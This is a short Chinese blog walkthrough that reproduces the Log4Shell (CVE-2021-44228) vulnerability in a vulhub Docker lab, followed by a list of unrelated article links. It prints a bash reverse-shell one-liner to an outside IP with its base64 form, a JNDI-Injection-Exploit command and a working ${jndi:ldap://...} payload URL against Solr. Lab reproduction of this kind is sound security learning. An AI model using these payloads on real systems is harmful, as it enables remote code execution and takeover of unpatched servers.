当前位置: 首页 > news >正文

log4j2漏洞复现(CVE-2021-44228)

news 2025/6/23 20:54:42

靶场环境

步骤一:设置出战规则

步骤二:开启靶场

cd vulhub
cd log4j
cd CVE-2021-44228
docker-compose up -d
docker ps

访问端口 靶机开启

步骤三:外带注入

获得dnslog

靶机访问dnslog

得到dnslog的二级域名信息

步骤四:构造恶意类 反弹shell

上传工具

安装java

构造恶意类

反弹shell加密

bash -i >& /dev/tcp/8.155.8.82/520 0>&1YmFzaCAtaSA+JiAvZGV2L3RjcC84LjE1NS44LjgyLzUyMCAwPiYx

java -jar JNDI-Injection-Exploit-1.0-SNAPSHOT-all.jar -C "bash -c {echo,YmFzaCAtaSA+JiAvZGV2L3RjcC84LjE1NS44LjgyLzUyMCAwPiYx}|{base64,-d}|{bash,-i}" -A "8.155.8.82"

访问ldamp 出现server.log 再开启本机端口监听

http://8.155.8.82:8983/solr/admin/cores?action=${jndi:ldap://8.155.8.82:1389/7qcpvt}

本机开启监听520端口

再刷新访问ldap 发现监听地址改变 已经从本机监听到了靶机的信息

http://www.lryc.cn/news/508826.html

相关文章:

  • tcpdump抓包分析
  • LearnOpenGL学习(碰撞检测,粒子)
  • 操作系统(24)提高磁盘I/O速度的途径
  • C/C++基础知识复习(45)
  • 现代C++锁介绍
  • Squid代理服务器的安装使用
  • 爬虫学习案例8
  • 深入了解 CouchDB 的 Mango 查询:操作符和限制
  • 基于SSM(Spring + Spring MVC + MyBatis)框架搭建一个病人跟踪信息管理系统
  • U盘文件名变乱码:原因、恢复与预防全解析
  • EasyGBS国标GB28181公网平台P2P远程访问故障诊断:云端服务端排查指南
  • 一网多平面
  • animatediff 模型网盘分享
  • ansible play-book玩法
  • MySQL索引-索引的分类和创建
  • 如何给负载均衡平台做好安全防御
  • HR/TA/HRBP的关系
  • Docker环境下MySQL数据库持久化部署全攻略
  • 如何查看pad的console输出,以便我们更好的进行调试,查看并了解实际可能的问题。
  • react中使用ResizeObserver来观察元素的size变化
  • Linux快速入门-Linux文件系统管理
  • 漏洞检测工具:Swagger UI敏感信息泄露
  • VSCode如何修改默认扩展路径和用户文件夹目录到D盘
  • 【超详细实操内容】django的身份验证系统之限制用户访问的三种方式
  • AI芯片常见概念
  • Linux 中 epoll 的详解
  • 增加nginx配置文件(conf.d), 管理多个项目
  • PostgreSQL编译安装教程
  • 【提审】Android包提审报权限问题
  • xdoj 数字个数统计